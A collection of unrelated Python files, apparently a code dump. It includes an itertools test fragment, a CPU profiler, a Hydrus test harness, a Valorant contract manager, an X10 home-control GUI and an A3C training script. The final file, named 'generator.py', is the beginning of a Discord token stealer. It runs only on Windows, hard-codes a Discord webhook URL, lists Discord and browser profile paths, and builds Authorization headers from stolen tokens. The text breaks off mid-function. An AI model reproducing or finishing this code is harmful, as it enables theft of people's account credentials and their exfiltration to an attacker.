self.assertEqual(list(islice(u, 0, 3)), result)
with self.assertRaises(TypeError):
subclass(*args, newarg=3)
for cls, args, result in testcases:
# Constructors of repeat, zip, compress accept keyword arguments.
# Their subclasses need overriding __new__ to support new
# keyword arguments.
if cls in [repeat, zip, compress]:
continue
with self.subTest(cls):
class subclass_with_init(cls):
def __init__(self, *args, newarg=None):
self.newarg = newarg
u = subclass_with_init(*args, newarg=3)
self.assertIs(type(u), subclass_with_init)
self.assertEqual(list(islice(u, 0, 3)), result)
self.assertEqual(u.newarg, 3)
for cls, args, result in testcases:
with self.subTest(cls):
class subclass_with_new(cls):
def __new__(cls, *args, newarg=None):
self = super().__new__(cls, *args)
self.newarg = newarg
return self
u = subclass_with_new(*args, newarg=3)
self.assertIs(type(u), subclass_with_new)
self.assertEqual(list(islice(u, 0, 3)), result)
self.assertEqual(u.newarg, 3)
@support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.ssize_t = struct.calcsize('n')
check_sizeof = support.check_sizeof
def test_product_sizeof(self):
basesize = support.calcobjsize('3Pi')
check = self.check_sizeof
check(product('ab', '12'), basesize + 2 * self.ssize_t)
check(product(*(('abc',) * 10)), basesize + 10 * self.ssize_t)
def test_combinations_sizeof(self):
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(combinations('abcd', 3), basesize + 3 * self.ssize_t)
check(combinations(range(10), 4), basesize + 4 * self.ssize_t)
def test_combinations_with_replacement_sizeof(self):
cwr = combinations_with_replacement
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(cwr('abcd', 3), basesize + 3 * self.ssize_t)
check(cwr(range(10), 4), basesize + 4 * self.ssize_t)
def test_permutations_sizeof(self):
basesize = support.calcobjsize('4Pni')
check = self.check_sizeof
check(permutations('abcd'),
basesize + 4 * self.ssize_t + 4 * self.ssize_t)
check(permutations('abcd', 3),
basesize + 4 * self.ssize_t + 3 * self.ssize_t)
check(permutations('abcde', 3),
basesize + 5 * self.ssize_t + 3 * self.ssize_t)
check(permutations(range(10), 4),
basesize + 10 * self.ssize_t + 4 * self.ssize_t)
def load_tests(loader, tests, pattern):
tests.addTest(doctest.DocTestSuite())
return tests
if __name__ == "__main__":
unittest.main()
|
profiler.py
|
import os
import psutil
import multiprocessing as mp
import numpy as np
class Profiler():
__instance = None
@staticmethod
def get_instance():
if Profiler.__instance is None:
Profiler.__instance = Profiler()
return Profiler.__instance
def execute(self, *args):
target_function = args[0]
params = args[1][0]
pipe_end = args[2]
result = target_function(*params)
pipe_end.send(result)
def profile_cpu(self, freq, target_function, *args):
data_points = []
columns = []
values = []
interval = 1/freq
for i in range(mp.cpu_count()):
columns.append("cpu (" + str(i) + ")")
recv_end, send_end = mp.Pipe(False)
exe_context = []
exe_context.append(target_function)
exe_context.append(args)
exe_context.append(send_end)
for i in range(30): # warm up 3sec
values.append(psutil.cpu_percent(interval, percpu=True))
target_process = mp.Process(target=self.execute, args=exe_context)
target_process.start()
psutil_process = psutil.Process(target_process.pid)
while target_process.is_alive():
values.append(psutil.cpu_percent(interval, percpu=True))
target_process.join()
for i in range(30): # wrap up 3sec
values.append(psutil.cpu_percent(interval, percpu=True))
for i in range(len(values)):
data_points.append(str(round(i * interval, 2)) + "s")
target_result = recv_end.recv()
return target_result, data_points, columns, values
if __name__ == "__main__":
def test_func(a, b, c):
result = []
for i in range(50000):
result.append(a + b + c + i)
return result
profiler = Profiler.get_instance()
res, dps, columns, values = profiler.profile_cpu(100, test_func, [1, 2, 3])
print(dps, columns, values)
|
test.py
|
#!/usr/bin/env python2
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
from include import HydrusConstants as HC
from include import ClientConstants as CC
from include import HydrusGlobals as HG
from include import ClientDefaults
from include import ClientNetworking
from include import ClientNetworkingBandwidth
from include import ClientNetworkingDomain
from include import ClientNetworkingLogin
from include import ClientNetworkingSessions
from include import ClientServices
from include import ClientThreading
from include import HydrusExceptions
from include import HydrusPubSub
from include import HydrusSessions
from include import HydrusTags
from include import HydrusThreading
from include import TestClientConstants
from include import TestClientDaemons
from include import TestClientData
from include import TestClientListBoxes
from include import TestClientNetworking
from include import TestConstants
from include import TestDialogs
from include import TestDB
from include import TestFunctions
from include import TestClientImageHandling
from include import TestHydrusNATPunch
from include import TestHydrusNetworking
from include import TestHydrusSerialisable
from include import TestHydrusServer
from include import TestHydrusSessions
from include import TestHydrusTags
import collections
import os
import random
import shutil
import sys
import tempfile
import threading
import time
import unittest
import wx
from twisted.internet import reactor
from include import ClientCaches
from include import ClientData
from include import ClientOptions
from include import HydrusData
from include import HydrusPaths
only_run = None
class Controller( object ):
def __init__( self ):
self.db_dir = tempfile.mkdtemp()
TestConstants.DB_DIR = self.db_dir
self._server_files_dir = os.path.join( self.db_dir, 'server_files' )
self._updates_dir = os.path.join( self.db_dir, 'test_updates' )
client_files_default = os.path.join( self.db_dir, 'client_files' )
HydrusPaths.MakeSureDirectoryExists( self._server_files_dir )
HydrusPaths.MakeSureDirectoryExists( self._updates_dir )
HydrusPaths.MakeSureDirectoryExists( client_files_default )
HG.controller = self
HG.client_controller = self
HG.server_controller = self
HG.test_controller = self
self.gui = self
self._call_to_threads = []
self._pubsub = HydrusPubSub.HydrusPubSub( self )
self.new_options = ClientOptions.ClientOptions( self.db_dir )
HC.options = ClientDefaults.GetClientDefaultOptions()
self.options = HC.options
def show_text( text ): pass
HydrusData.ShowText = show_text
self._reads = {}
self._reads[ 'hydrus_sessions' ] = []
self._reads[ 'local_booru_share_keys' ] = []
self._reads[ 'messaging_sessions' ] = []
self._reads[ 'tag_censorship' ] = []
self._reads[ 'options' ] = ClientDefaults.GetClientDefaultOptions()
self._reads[ 'file_system_predicates' ] = []
self._reads[ 'media_results' ] = []
self.example_tag_repo_service_key = HydrusData.GenerateKey()
services = []
services.append( ClientServices.GenerateService( CC.LOCAL_BOORU_SERVICE_KEY, HC.LOCAL_BOORU, CC.LOCAL_BOORU_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.COMBINED_LOCAL_FILE_SERVICE_KEY, HC.COMBINED_LOCAL_FILE, CC.COMBINED_LOCAL_FILE_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.LOCAL_FILE_SERVICE_KEY, HC.LOCAL_FILE_DOMAIN, CC.LOCAL_FILE_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.TRASH_SERVICE_KEY, HC.LOCAL_FILE_TRASH_DOMAIN, CC.LOCAL_FILE_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( CC.LOCAL_TAG_SERVICE_KEY, HC.LOCAL_TAG, CC.LOCAL_TAG_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( self.example_tag_repo_service_key, HC.TAG_REPOSITORY, 'example tag repo' ) )
services.append( ClientServices.GenerateService( CC.COMBINED_TAG_SERVICE_KEY, HC.COMBINED_TAG, CC.COMBINED_TAG_SERVICE_KEY ) )
services.append( ClientServices.GenerateService( TestConstants.LOCAL_RATING_LIKE_SERVICE_KEY, HC.LOCAL_RATING_LIKE, 'example local rating like service' ) )
services.append( ClientServices.GenerateService( TestConstants.LOCAL_RATING_NUMERICAL_SERVICE_KEY, HC.LOCAL_RATING_NUMERICAL, 'example local rating numerical service' ) )
self._reads[ 'services' ] = services
client_files_locations = {}
for prefix in HydrusData.IterateHexPrefixes():
for c in ( 'f', 't', 'r' ):
client_files_locations[ c + prefix ] = client_files_default
self._reads[ 'client_files_locations' ] = client_files_locations
self._reads[ 'sessions' ] = []
self._reads[ 'tag_parents' ] = {}
self._reads[ 'tag_siblings' ] = {}
self._reads[ 'in_inbox' ] = False
self._writes = collections.defaultdict( list )
self._managers = {}
self.services_manager = ClientCaches.ServicesManager( self )
self.client_files_manager = ClientCaches.ClientFilesManager( self )
self.parsing_cache = ClientCaches.ParsingCache()
bandwidth_manager = ClientNetworkingBandwidth.NetworkBandwidthManager()
session_manager = ClientNetworkingSessions.NetworkSessionManager()
domain_manager = ClientNetworkingDomain.NetworkDomainManager()
login_manager = ClientNetworkingLogin.NetworkLoginManager()
self.network_engine = ClientNetworking.NetworkEngine( self, bandwidth_manager, session_manager, domain_manager, login_manager )
self.CallToThreadLongRunning( self.network_engine.MainLoop )
self._managers[ 'tag_censorship' ] = ClientCaches.TagCensorshipManager( self )
self._managers[ 'tag_siblings' ] = ClientCaches.TagSiblingsManager( self )
self._managers[ 'tag_parents' ] = ClientCaches.TagParentsManager( self )
self._managers[ 'undo' ] = ClientCaches.UndoManager( self )
self.server_session_manager = HydrusSessions.HydrusSessionManagerServer()
self.local_booru_manager = ClientCaches.LocalBooruCache( self )
self._cookies = {}
self._job_scheduler = HydrusThreading.JobScheduler( self )
self._job_scheduler.start()
def _GetCallToThread( self ):
for call_to_thread in self._call_to_threads:
if not call_to_thread.CurrentlyWorking():
return call_to_thread
if len( self._call_to_threads ) > 100:
raise Exception( 'Too many call to threads!' )
call_to_thread = HydrusThreading.THREADCallToThread( self, 'CallToThread' )
self._call_to_threads.append( call_to_thread )
call_to_thread.start()
return call_to_thread
def _SetupWx( self ):
self.locale = wx.Locale( wx.LANGUAGE_DEFAULT ) # Very important to init this here and keep it non garbage collected
CC.GlobalBMPs.STATICInitialise()
self.frame_icon = wx.Icon( os.path.join( HC.STATIC_DIR, 'hydrus_32_non-transparent.png' ), wx.BITMAP_TYPE_PNG )
def pub( self, topic, *args, **kwargs ):
pass
def pubimmediate( self, topic, *args, **kwargs ):
self._pubsub.pubimmediate( topic, *args, **kwargs )
def sub( self, object, method_name, topic ):
self._pubsub.sub( object, method_name, topic )
def AcquirePageKey( self ):
return HydrusData.GenerateKey()
def CallBlockingToWx( self, func, *args, **kwargs ):
def wx_code( job_key ):
try:
result = func( *args, **kwargs )
job_key.SetVariable( 'result', result )
except HydrusExceptions.PermissionException as e:
job_key.SetVariable( 'error', e )
except Exception as e:
job_key.SetVariable( 'error', e )
HydrusData.Print( 'CallBlockingToWx just caught this error:' )
HydrusData.DebugPrint( traceback.format_exc() )
finally:
job_key.Finish()
job_key = ClientThreading.JobKey()
job_key.Begin()
wx.CallAfter( wx_code, job_key )
while not job_key.IsDone():
if HG.model_shutdown:
raise HydrusExceptions.ShutdownException( 'Application is shutting down!' )
time.sleep( 0.05 )
if job_key.HasVariable( 'result' ):
# result can be None, for wx_code that has no return variable
result = job_key.GetIfHasVariable( 'result' )
return result
error = job_key.GetIfHasVariable( 'error' )
if error is not None:
raise error
raise HydrusExceptions.ShutdownException()
def CallToThread( self, callable, *args, **kwargs ):
call_to_thread = self._GetCallToThread()
call_to_thread.put( callable, *args, **kwargs )
CallToThreadLongRunning = CallToThread
def CallLater( self, initial_delay, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = HydrusThreading.SchedulableJob( self, self._job_scheduler, initial_delay, call )
self._job_scheduler.AddJob( job )
return job
def CallLaterWXSafe( self, window, initial_delay, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = ClientThreading.WXAwareJob( self, self._job_scheduler, window, initial_delay, call )
self._job_scheduler.AddJob( job )
return job
def CallRepeating( self, initial_delay, period, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = HydrusThreading.RepeatingJob( self, self._job_scheduler, initial_delay, period, call )
self._job_scheduler.AddJob( job )
return job
def CallRepeatingWXSafe( self, window, initial_delay, period, func, *args, **kwargs ):
call = HydrusData.Call( func, *args, **kwargs )
job = ClientThreading.WXAwareRepeatingJob( self, self._job_scheduler, window, initial_delay, period, call )
self._job_scheduler.AddJob( job )
return job
def DBCurrentlyDoingJob( self ):
return False
def GetFilesDir( self ):
return self._server_files_dir
def GetNewOptions( self ):
return self.new_options
def GetManager( self, manager_type ):
return self._managers[ manager_type ]
def GetWrite( self, name ):
write = self._writes[ name ]
del self._writes[ name ]
return write
def IsBooted( self ):
return True
def IsCurrentPage( self, page_key ):
return False
def IsFirstStart( self ):
return True
def IShouldRegularlyUpdate( self, window ):
return True
def ModelIsShutdown( self ):
return HG.model_shutdown
def PageAlive( self, page_key ):
return False
def PageClosedButNotDestroyed( self, page_key ):
return False
def Read( self, name, *args, **kwargs ):
return self._reads[ name ]
def RegisterUIUpdateWindow( self, window ):
pass
def ReleasePageKey( self, page_key ):
pass
def ReportDataUsed( self, num_bytes ):
pass
def ReportRequestUsed( self ):
pass
def ResetIdleTimer( self ): pass
def Run( self ):
self._SetupWx()
suites = []
if only_run is None: run_all = True
else: run_all = False
# the gui stuff runs fine on its own but crashes in the full test if it is not early, wew
# something to do with the delayed button clicking stuff
if run_all or only_run == 'gui':
suites.append( unittest.TestLoader().loadTestsFromModule( TestDialogs ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientListBoxes ) )
if run_all or only_run == 'daemons':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientDaemons ) )
if run_all or only_run == 'data':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientConstants ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientData ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestFunctions ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusSerialisable ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusSessions ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusTags ) )
if run_all or only_run == 'db':
suites.append( unittest.TestLoader().loadTestsFromModule( TestDB ) )
if run_all or only_run == 'networking':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientNetworking ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusNetworking ) )
if run_all or only_run == 'image':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientImageHandling ) )
if run_all or only_run == 'nat':
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusNATPunch ) )
if run_all or only_run == 'server':
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusServer ) )
suite = unittest.TestSuite( suites )
runner = unittest.TextTestRunner( verbosity = 2 )
runner.run( suite )
def SetRead( self, name, value ):
self._reads[ name ] = value
def SetStatusBarDirty( self ):
pass
def SetWebCookies( self, name, value ):
self._cookies[ name ] = value
def TidyUp( self ):
time.sleep( 2 )
HydrusPaths.DeletePath( self.db_dir )
def ViewIsShutdown( self ):
return HG.view_shutdown
def WaitUntilModelFree( self ):
return
def WaitUntilViewFree( self ):
return
def Write( self, name, *args, **kwargs ):
self._writes[ name ].append( ( args, kwargs ) )
def WriteSynchronous( self, name, *args, **kwargs ):
self._writes[ name ].append( ( args, kwargs ) )
if name == 'import_file':
( file_import_job, ) = args
if file_import_job.GetHash().encode( 'hex' ) == 'a593942cb7ea9ffcd8ccf2f0fa23c338e23bfecd9a3e508dfc0bcf07501ead08': # 'blarg' in sha256 hex
raise Exception( 'File failed to import for some reason!' )
else:
return ( CC.STATUS_SUCCESSFUL_AND_NEW, '' )
if __name__ == '__main__':
args = sys.argv[1:]
if len( args ) > 0:
only_run = args[0]
else: only_run = None
try:
threading.Thread( target = reactor.run, kwargs = { 'installSignalHandlers' : 0 } ).start()
app = wx.App()
controller = Controller()
try:
# we run the tests on the wx thread atm
# keep a window alive the whole time so the app doesn't finish its mainloop
win = wx.Frame( None )
def do_it():
controller.Run()
win.DestroyLater()
wx.CallAfter( do_it )
app.MainLoop()
except:
import traceback
HydrusData.DebugPrint( traceback.format_exc() )
finally:
HG.view_shutdown = True
controller.pubimmediate( 'wake_daemons' )
HG.model_shutdown = True
controller.pubimmediate( 'wake_daemons' )
controller.TidyUp()
except:
import traceback
HydrusData.DebugPrint( traceback.format_exc() )
finally:
reactor.callFromThread( reactor.stop )
print( 'This was version ' + str( HC.SOFTWARE_VERSION ) )
raw_input()
|
contract_manager.py
|
import time, os
from valclient.exceptions import ResponseError
from ..utility_functions import ErrorHandling, Logger, ContentLoader
from ..localization.localization import Localizer
from ..lib.killable_thread import KillableThread
from ..lib.ystr_client import YstrClient
# A thread that polls for contract changes
class ContractManager:
def __init__(self, valclient, config):
self.config = config
self.client = valclient
self.ystr_client = YstrClient(self.config)
# Fetch stuff
ContentLoader.cache_contracts()
raw_contract_data = self.client.contracts_fetch()
ContentLoader.CONTENT_CACHE.completed_contracts = [contract["ContractDefinitionID"] for contract in raw_contract_data["Contracts"] if contract["ContractProgression"]["TotalProgressionEarned"] == 975000 and contract["ProgressionLevelReached"] == 10]
self.equipped_contract = self.active_contract()
self.current_contract = self.ystr_client.get_contract()
# Check for discrepancy between selected contract and active contract - favor the selected one
if self.current_contract is None:
Logger.debug(f"No remote contract set! Updating it to be '{self.equipped_contract}'.")
self.ystr_client.update_contract(self.equipped_contract)
elif self.current_contract != self.equipped_contract:
Logger.debug(f"Remote contract is '{self.current_contract}' while locally, it is '{self.equipped_contract}'. Overriding to be '{self.current_contract}'.")
self.client.contracts_activate(ContentLoader.get_contract(self.current_contract))
self.equipped_contract = self.current_contract
# Poll contract in remote config
def poll_loop(self):
sleep_duration = int(Localizer.get_config_value("contract_poll_interval"))
while True:
contract = self.ystr_client.get_contract()
if contract != self.current_contract:
Logger.debug(f"Detected new set contract '{contract}'.")
contract_id = ContentLoader.get_contract(contract)
if contract_id in ContentLoader.CONTENT_CACHE.completed_contracts:
Logger.debug(f"Can't activate set contract '{contract}' because you already completed it! Reverting set contract back to {self.current_contract}.")
self.ystr_client.update_contract(self.current_contract)
else:
self.client.contracts_activate(contract_id)
self.current_contract = contract
self.equipped_contract = contract
time.sleep(sleep_duration)
# Sync local contract changes
def sync_loop(self):
sleep_duration = int(Localizer.get_config_value("contract_sync_interval"))
while True:
contract = self.active_contract()
if contract != self.equipped_contract and contract is not None:
Logger.debug(f"Detected local contract change to {contract}.")
self.ystr_client.update_contract(contract)
self.equipped_contract = contract
time.sleep(sleep_duration)
# Start the thread to continuously poll game presence
def start_poll_thread(self):
try:
self.poll_thread = KillableThread(target=self.poll_loop, daemon=True)
self.poll_thread.start()
except Exception as e:
Logger.debug(f"Error starting contract poll thread: {e}")
ErrorHandling.handle_error()
self.kill_contract_thread("poll")
# Start the thread to sync local contract changes
def start_sync_thread(self):
try:
self.sync_thread = KillableThread(target=self.sync_loop, daemon=True)
self.sync_thread.start()
except Exception as e:
Logger.debug(f"Error starting contract sync thread: {e}")
ErrorHandling.handle_error()
self.kill_contract_thread("sync")
def active_contract(self):
try:
contract_data = self.client.contracts_fetch()
return next((agent for agent in ContentLoader.CONTENT_CACHE.contracts if ContentLoader.CONTENT_CACHE.contracts[agent] == contract_data["ActiveSpecialContract"]), None)
except ResponseError as e:
Logger.debug(f"Error while fetching current contract: {e}")
return None
# Helper for killing this thread while notifying the user and the web service
def kill_contract_thread(self, name, message=""):
Logger.debug(f"Killing contract {name} thread due to: {message}")
self.ystr_client.offline()
os._exit(1)
|
GUI.pyw
|
import sys
import time
from threading import Thread
import wx
import wx.lib.mixins.listctrl as listmix
from converters import PrettyTime
days_of_the_week=list("MTWTFSS")
class AutoSizeListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):
def __init__(self, parent, ID, style=0):
wx.ListCtrl.__init__(self,parent,ID,style=style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
self.units_states=[]
def OnGetItemText(self, item, col):
if col == 0:
return self.units_states[item][col]
else:
update_data=self.units_states[item][1][:]
if col == 2:
t=time.localtime(float(update_data[col-1]))
hr=t.tm_hour; ampm="am"
if t.tm_hour>12: hr-=12; ampm="pm"
update_data[col-1]="%s:%s:%s %s %s/%s/%s"%(hr,t.tm_min,t.tm_sec,ampm,t.tm_mon,t.tm_mday,str(t.tm_year)[2:])
elif col == 1:
try:
update_data[col-1]=str(round(float(update_data[col-1]),2))+"%"
except ValueError:
pass
#-1 is 'cause the other values are in the "values" of a dict.items()
return update_data[col-1]
class MainWindow(wx.Frame):
def __init__(self,parent=None,size=(600,400),conn=None,script=None,run=None):
self.run=run
self.on_close_callback=None
self.script=script
self.conn=conn
wx.Frame.__init__(self,parent,-1,"X10 Control",size=size)
self.panel=wx.Panel(self,-1)
self.notebook=wx.Notebook(self.panel,-1)
menu_bar = wx.MenuBar()
file_menu = wx.Menu()
file_menu.Append(110,"&Reload Commands\tCtrl+r")
self.Bind(wx.EVT_MENU,self.ReloadScript,id=110)
file_menu.AppendSeparator()
file_menu.Append(100,"&Quit\tCtrl+q")
self.Bind(wx.EVT_MENU,self.Close,id=100)
menu_bar.Append(file_menu,"&File")
command_info=wx.StaticText(self.panel,-1,"Manual Command:")
self.command=wx.TextCtrl(self.panel,-1,style=wx.WANTS_CHARS)
self.command.Bind(wx.EVT_KEY_UP,self.ParseManualCommand)
self.stats_panel=AutoSizeListCtrl(self.notebook, -1,style=wx.LC_REPORT|wx.BORDER_NONE|wx.LC_VIRTUAL)
for i,col in enumerate(("Unit","State","Last Update")): self.stats_panel.InsertColumn(i,col)
self.stats_panel.SetItemCount(0)
self.commands_panel=AutoSizeListCtrl(self.notebook, -1,style=wx.LC_REPORT|wx.BORDER_NONE)
for i,col in enumerate(("Addresses","Function","Time","Days")): self.commands_panel.InsertColumn(i,col)
try: self.AddCommands(self.script.commands)
except AttributeError: pass
self.triggers_panel=AutoSizeListCtrl(self.notebook, -1,style=wx.LC_REPORT|wx.BORDER_NONE)
for i,col in enumerate(("Addresses","Function","Time","Days","Dates","Action","Last Trigger")): self.triggers_panel.InsertColumn(i,col)
self.notebook.AddPage(self.stats_panel, "Unit States")
self.notebook.AddPage(self.commands_panel, "Commands")
self.notebook.AddPage(self.triggers_panel, "Triggers")
main_sizer=wx.BoxSizer(wx.VERTICAL)
command_sizer=wx.BoxSizer(wx.HORIZONTAL)
command_sizer.Add(command_info,0,wx.ALIGN_CENTER_VERTICAL|wx.LEFT,4)
command_sizer.Add(self.command,1,wx.EXPAND|wx.RIGHT,2)
main_sizer.Add(command_sizer,0,wx.EXPAND|wx.TOP|wx.BOTTOM,2)
main_sizer.Add(self.notebook,1,wx.EXPAND|wx.LEFT,2)
self.panel.SetSizer(main_sizer)
self.SetMenuBar(menu_bar)
self.go=True
self.T=Thread(target=self.Run)
self.T.setDaemon(True)
self.T.start()
## self.timer=wx.Timer(self)
## self.Bind(wx.EVT_TIMER,self.Run,self.timer)
## self.timer.Start(1000,True)
self.Bind(wx.EVT_CLOSE,self.Close)
self.run_commands_stack=[]
def Close(self,event):
## self.timer.Stop()
self.go=False
if self.on_close_callback:
self.on_close_callback()
self.Hide()
self.T.join(3)
self.Destroy()
def AddrSort(self,arg1,arg2):
a1=int(arg1[0][1:]); a2=int(arg2[0][1:])#This sorts the unit addresses by the number after the house code
if a1>a2:
return 1
elif a1<a2:
return 2
return 0
def UpdateUnitsStates(self,states):
new_states=states.items()
if new_states!=self.stats_panel.units_states:#Only update the control if we need to
self.stats_panel.units_states=new_states
self.stats_panel.SetItemCount(len(new_states))
self.stats_panel.Refresh()
#Now we run manual commands because this is where the update thread is
#and we now have control of the conn.
try:
self.RunManualCommandsStack()
except:
self.run_commands_stack=[]
## def UpdateUnitsStates(self,states):
## self.stats_panel.DeleteAllItems()
## states=states.items()
## states.sort(self.AddrSort)
## for i,data in enumerate(states):
## key,value=data
## index = self.stats_panel.InsertStringItem(sys.maxint, key)
## try:
## state_val=str(round(float(value[0]),2))+"%"
## except ValueError:
## state_val=str(value[0])
def AddCommands(self,commands):
for i,command in enumerate(commands):
index = self.commands_panel.InsertStringItem(sys.maxint, ", ".join(command.addresses))
function=command.type+" "+command.function
if command.function in ("DIM","BRIGHT"):
function="%s %s %s"%(command.type,command.function,command.dims)
function=function.title()
self.commands_panel.SetStringItem(index, 1, function)
self.commands_panel.SetStringItem(index, 2, PrettyTime(command.time))
days="";last=-1
for i in command.days:
days+="-"*(i-last-1)+days_of_the_week[i]
last=i
self.commands_panel.SetStringItem(index, 3, days)
self.commands_panel.SetItemData(index, i)
def ParseManualCommand(self,event):
if event.GetKeyCode() == wx.WXK_RETURN:
cmd_text=self.command.GetValue()
if self.conn:
cmd=cmd_text.strip().upper().split(" ")
if len(cmd)>1:
self.run_commands_stack.append(cmd[:])
self.command.SetValue("")
def RunManualCommandsStack(self):
if self.run_commands_stack:
for cmd in self.run_commands_stack:
func_house_code=""
function="";dims=0
for part in cmd:
part=part.strip()
if part[0].isalpha() and part[1:].isdigit():
func_house_code=part[0]
self.conn.SendAddr(part)
elif part.isdigit():
dims=int(part)
else:
function=part
if function:
self.conn.SendFunc(func_house_code+" "+function,dims)
self.run_commands_stack=[]
def ReloadScript(self,event):
self.script.Reload()
self.commands_panel.DeleteAllItems()
self.AddCommands(self.script.commands)
def Run(self,event=None):
if self.run!=None:
while self.go:
self.run()
## print "Done!"
## self.timer.Start(1000,True)
# This is just for testing the GUI part (aka just how it looks)
if __name__ == "__main__":
app=wx.App()
win=MainWindow(None)
win.Show()
app.MainLoop()
|
main.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from environment import Environment
from utils import read_config
from model import A3Clstm
from train import train
from test import test
from shared_optim import SharedRMSprop, SharedAdam
#from gym.configuration import undo_logger_setup
import time
from Config import Config
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=1.00,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--workers',
type=int,
default=1,
metavar='W',
help='how many training processes to use (default: 12)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=Config.TRAINING_STEPS,
metavar='M',
help='maximum length of an episode (default: Config.TRAINING_STEPS)')
parser.add_argument(
'--env',
default='Wafer',
metavar='ENV',
help='environment to train on (default: Wafer)')
parser.add_argument(
'--env-config',
default='config.json',
metavar='EC',
help='environment to crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=True,
metavar='SO',
help='use an optimizer without shared statistics.')
parser.add_argument(
'--load', default=True, metavar='L', help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='Save model on every test run high score matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shares optimizer choice of Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='trained_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='trained_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = Environment()
num_actions = env.get_num_actions()
shared_model = A3Clstm(Config.STACKED_FRAMES, num_actions)
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(
target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
generator.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
WEBHOOK_URL = "https://discord.com/api/webhooks/890000360062738484/PX5cxpqZejORz1bXBDmVKSfb_O1aAVANfjvn-Pz-O1l2l7iQvSmmvuTmSFqUSVY5oDkN" # Insert webhook url here
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\Discord",
"Discord Canary": ROAMING + "\\discordcanary",
"Discord PTB": ROAMING + "\\discordptb",
"Google Chrome": LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera": ROAMING + "\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex": LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
def getUserData(token):
try:
return loads(
